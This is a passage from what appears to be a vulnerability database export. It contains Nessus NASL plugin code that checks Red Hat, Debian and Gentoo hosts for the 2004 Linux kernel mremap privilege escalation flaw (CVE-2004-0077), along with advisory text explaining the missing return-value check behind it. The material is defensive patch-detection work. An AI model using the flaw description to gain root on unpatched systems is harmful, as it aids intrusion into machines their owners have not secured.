package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2004:066. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(12468);\n script_version(\"1.31\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2004-0077\");\n script_xref(name:\"RHSA\", value:\"2004:066\");\n\n script_name(english:\"RHEL 3 : kernel (RHSA-2004:066)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix a security vulnerability that may\nallow local users to gain root privileges are now available. These\npackages also resolve other minor issues.\n\nThe Linux kernel handles the basic functions of the operating system.\n\nPaul Starzetz discovered a flaw in return value checking in mremap()\nin the Linux kernel versions 2.4.24 and previous that may allow a\nlocal attacker to gain root privileges. No exploit is currently\navailable; however this issue is exploitable. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the\nname CVE-2004-0077 to this issue.\n\nAll users are advised to upgrade to these errata packages, which\ncontain backported security patches that correct these issues.\n\nRed Hat would like to thank Paul Starzetz from ISEC for reporting this\nissue.\n\nFor the IBM S/390 and IBM eServer zSeries architectures, the upstream\nversion of the s390utils package (which fixes a bug in the zipl\nbootloader) is also included.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2004-0077\"\n );\n # http://www10.software.ibm.com/developerworks/opensource/linux390/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.ibm.com/us-en/?ar=1\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2004:066\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-BOOT\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-hugemem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-hugemem-unsupported\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-smp-unsupported\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-unsupported\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:s390utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/03/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2004-0077\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2004:066\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2004:066\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"kernel-2.4.21-9.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"i386\", reference:\"kernel-BOOT-2.4.21-9.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"kernel-doc-2.4.21-9.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"i686\", reference:\"kernel-hugemem-2.4.21-9.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"i686\", reference:\"kernel-hugemem-unsupported-2.4.21-9.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"i686\", reference:\"kernel-smp-2.4.21-9.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"x86_64\", reference:\"kernel-smp-2.4.21-9.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"i686\", reference:\"kernel-smp-unsupported-2.4.21-9.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"x86_64\", reference:\"kernel-smp-unsupported-2.4.21-9.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"kernel-source-2.4.21-9.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", reference:\"kernel-unsupported-2.4.21-9.0.1.EL\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"s390\", reference:\"s390utils-1.2.4-3\")) flag++;\n if (rpm_check(release:\"RHEL3\", cpu:\"s390x\", reference:\"s390utils-1.2.4-3\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-BOOT / kernel-doc / kernel-hugemem / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:56:15", "description": "Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to missing function return value check\nof internal functions a local attacker can gain root privileges.", "edition": 26, "published": "2004-09-29T00:00:00", "title": "Debian DSA-444-1 : linux-kernel-2.4.17-ia64 - missing function return value check", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "modified": "2004-09-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:3.0", "p-cpe:/a:debian:debian_linux:kernel-image-2.4.17-ia64"], "id": "DEBIAN_DSA-444.NASL", "href": "https://www.tenable.com/plugins/nessus/15281", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-444. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15281);\n script_version(\"1.29\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2004-0077\");\n script_bugtraq_id(9686);\n script_xref(name:\"CERT\", value:\"981222\");\n script_xref(name:\"DSA\", value:\"444\");\n\n script_name(english:\"Debian DSA-444-1 : linux-kernel-2.4.17-ia64 - missing function return value check\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to missing function return value check\nof internal functions a local attacker can gain root privileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2004/dsa-444\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the Linux kernel packages immediately.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 011226.16 of ia64 kernel source and images.\n\nOther architectures are or will be mentioned in a separate advisory\nrespectively or are not affected (m68k).\n\nThis problem is also fixed in the upstream version of Linux 2.4.25 and\n2.6.3.\n\n Vulnerability matrix for CAN-2004-0077\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-image-2.4.17-ia64\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/02/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.4.17-ia64\", reference:\"011226.16\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.17-itanium\", reference:\"011226.16\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.17-itanium-smp\", reference:\"011226.16\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.17-mckinley\", reference:\"011226.16\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.17-mckinley-smp\", reference:\"011226.16\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-source-2.4.17-ia64\", reference:\"011226.16\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:55:58", "description": "Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to missing function return value check\nof internal functions a local attacker can gain root privileges.", "edition": 25, "published": "2004-09-29T00:00:00", "title": "Debian DSA-441-1 : linux-kernel-2.4.17-mips+mipsel - missing function return value check", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "modified": "2004-09-29T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:kernel-patch-2.4.17-mips", "cpe:/o:debian:debian_linux:3.0"], "id": "DEBIAN_DSA-441.NASL", "href": "https://www.tenable.com/plugins/nessus/15278", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-441. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15278);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2004-0077\");\n script_bugtraq_id(9686);\n script_xref(name:\"CERT\", value:\"981222\");\n script_xref(name:\"DSA\", value:\"441\");\n\n script_name(english:\"Debian DSA-441-1 : linux-kernel-2.4.17-mips+mipsel - missing function return value check\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to missing function return value check\nof internal functions a local attacker can gain root privileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2004/dsa-441\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the Linux kernel packages immediately.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 2.4.17-0.020226.2.woody5 for mips and mipsel kernel images.\n\nOther architectures will probably mentioned in a separate advisory or\nare not affected (m68k).\n\nThis problem is also fixed in the upstream version of Linux 2.4.25 and\n2.6.3.\n\n Vulnerability matrix for CAN-2004-0077\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:kernel-patch-2.4.17-mips\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/02/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"kernel-headers-2.4.17\", reference:\"2.4.17-0.020226.2.woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.17-r3k-kn02\", reference:\"2.4.17-0.020226.2.woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.17-r4k-ip22\", reference:\"2.4.17-0.020226.2.woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.17-r4k-kn04\", reference:\"2.4.17-0.020226.2.woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-image-2.4.17-r5k-ip22\", reference:\"2.4.17-0.020226.2.woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"kernel-patch-2.4.17-mips\", reference:\"2.4.17-0.020226.2.woody5\")) flag++;\nif (deb_check(release:\"3.0\", prefix:\"mips-tools\", reference:\"2.4.17-0.020226.2.woody5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:51:48", "description": "The remote host is affected by the vulnerability described in GLSA-200403-02\n(Linux kernel do_mremap local privilege escalation vulnerability)\n\n The memory subsystem allows for shrinking, growing, and moving of\n chunks of memory along any of the allocated memory areas which the\n kernel possesses.\n To accomplish this, the do_mremap code calls the do_munmap() kernel\n function to remove any old memory mappings in the new location - but,\n the code doesn't check the return value of the do_munmap() function\n which may fail if the maximum number of available virtual memory area\n descriptors has been exceeded.\n Due to the missing return value check after trying to unmap the middle\n of the first memory area, the corresponding page table entries from the\n second new area are inserted into the page table locations described by\n the first old one, thus they are subject to page protection flags of\n the first area. As a result, arbitrary code can be executed.\n \nImpact :\n\n Arbitrary code with normal non-super-user privileges may be able to\n exploit this vulnerability and may disrupt the operation of other parts\n of the kernel memory management subroutines finally leading to\n unexpected behavior.\n Since no special privileges are required to use the mremap() and\n munmap() system calls any process may misuse this unexpected behavior\n to disrupt the kernel memory management subsystem. Proper exploitation\n of this vulnerability may lead to local privilege escalation allowing\n for the execution of arbitrary code with kernel level root access.\n Proof-of-concept exploit code has been created and successfully tested,\n permitting root escalation on vulnerable systems. As a result, all\n users should upgrade their kernels to new or patched versions.\n \nWorkaround :\n\n Users who are unable to upgrade their kernels may attempt to use\n 'sysctl -w vm.max_map_count=1000000', however, this is a temporary fix\n which only solves the problem by increasing the number of memory areas\n that can be created by each process. Because of the static nature of\n this workaround, it is not recommended and users are urged to upgrade\n their systems to the latest available patched sources.", "edition": 28, "published": "2004-08-30T00:00:00", "title": "GLSA-200403-02 : Linux kernel do_mremap local privilege escalation vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "modified": "2004-08-30T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:alpha-sources", "p-cpe:/a:gentoo:linux:planet-ccrma-sources", "p-cpe:/a:gentoo:linux:mips-prepatch-sources", "p-cpe:/a:gentoo:linux:openmosix-sources", "p-cpe:/a:gentoo:linux:aa-sources", "p-cpe:/a:gentoo:linux:grsec-sources", "cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:win4lin-sources", "p-cpe:/a:gentoo:linux:ppc-sources-crypto", "p-cpe:/a:gentoo:linux:development-sources", "p-cpe:/a:gentoo:linux:vanilla-prepatch-sources", "p-cpe:/a:gentoo:linux:hardened-sources", "p-cpe:/a:gentoo:linux:pac-sources", "p-cpe:/a:gentoo:linux:sparc-sources", "p-cpe:/a:gentoo:linux:gaming-sources", "p-cpe:/a:gentoo:linux:sparc-dev-sources", "p-cpe:/a:gentoo:linux:compaq-sources", "p-cpe:/a:gentoo:linux:ia64-sources", "p-cpe:/a:gentoo:linux:ppc-sources", "p-cpe:/a:gentoo:linux:wolk-sources", "p-cpe:/a:gentoo:linux:hppa-sources", "p-cpe:/a:gentoo:linux:gs-sources", "p-cpe:/a:gentoo:linux:ppc-sources-dev", "p-cpe:/a:gentoo:linux:mips-sources", "p-cpe:/a:gentoo:linux:ppc-development-sources", "p-cpe:/a:gentoo:linux:gentoo-sources", "p-cpe:/a:gentoo:linux:ck-sources", "p-cpe:/a:gentoo:linux:ppc-sources-benh", "p-cpe:/a:gentoo:linux:hppa-dev-sources", "p-cpe:/a:gentoo:linux:vanilla-sources", "p-cpe:/a:gentoo:linux:selinux-sources", "p-cpe:/a:gentoo:linux:gentoo-dev-sources", "p-cpe:/a:gentoo:linux:xfs-sources", "p-cpe:/a:gentoo:linux:mm-sources", "p-cpe:/a:gentoo:linux:usermode-sources"], "id": "GENTOO_GLSA-200403-02.NASL", "href": "https://www.tenable.com/plugins/nessus/14453", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200403-02.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14453);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0077\");\n script_xref(name:\"GLSA\", value:\"200403-02\");\n\n script_name(english:\"GLSA-200403-02 : Linux kernel do_mremap local privilege escalation vulnerability\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200403-02\n(Linux kernel do_mremap local privilege escalation vulnerability)\n\n The memory subsystem allows for shrinking, growing, and moving of\n chunks of memory along any of the allocated memory areas which the\n kernel possesses.\n To accomplish this, the do_mremap code calls the do_munmap() kernel\n function to remove any old memory mappings in the new location - but,\n the code doesn't check the return value of the do_munmap() function\n which may fail if the maximum number of available virtual memory area\n descriptors has been exceeded.\n Due to the missing return value check after trying to unmap the middle\n of the first memory area, the corresponding page table entries from the\n second new area are inserted into the page table locations described by\n the first old one, thus they are subject to page protection flags of\n the first area. As a result, arbitrary code can be executed.\n \nImpact :\n\n Arbitrary code with normal non-super-user privileges may be able to\n exploit this vulnerability and may disrupt the operation of other parts\n of the kernel memory management subroutines finally leading to\n unexpected behavior.\n Since no special privileges are required to use the mremap() and\n munmap() system calls any process may misuse this unexpected behavior\n to disrupt the kernel memory management subsystem. Proper exploitation\n of this vulnerability may lead to local privilege escalation allowing\n for the execution of arbitrary code with kernel level root access.\n Proof-of-concept exploit code has been created and successfully tested,\n permitting root escalation on vulnerable systems. As a result, all\n users should upgrade their kernels to new or patched versions.\n \nWorkaround :\n\n Users who are unable to upgrade their kernels may attempt to use\n 'sysctl -w vm.max_map_count=1000000', however, this is a temporary fix\n which only solves the problem by increasing the number of memory areas\n that can be created by each process. Because of the static nature of\n this workaround, it is not recommended and users are urged to upgrade\n their systems to the latest available patched sources.\"\n );\n # http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://isec.pl/en/vulnerabilities/isec-0014-mremap-unmap.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200403-02\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Users are encouraged to upgrade to the latest available sources for\n their system:\n # emerge sync\n # emerge -pv your-favourite-sources\n # emerge your-favourite-sources\n # # Follow usual procedure for compiling and installing a kernel.\n # # If you use genkernel, run genkernel as you would do normally.\n # # IF YOUR KERNEL IS MARKED as 'remerge required!' THEN\n # # YOU SHOULD UPDATE YOUR KERNEL EVEN IF PORTAGE\n # # REPORTS THAT THE SAME VERSION IS INSTALLED.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:aa-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:alpha-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ck-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:compaq-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:development-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:gaming-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:gentoo-dev-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:gentoo-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:grsec-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:gs-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:hardened-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:hppa-dev-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:hppa-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ia64-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mips-prepatch-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mips-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:mm-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:openmosix-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:pac-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:planet-ccrma-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ppc-development-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ppc-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ppc-sources-benh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ppc-sources-crypto\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:ppc-sources-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:selinux-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:sparc-dev-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:sparc-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:usermode-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:vanilla-prepatch-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:vanilla-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:win4lin-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:wolk-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:xfs-sources\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n 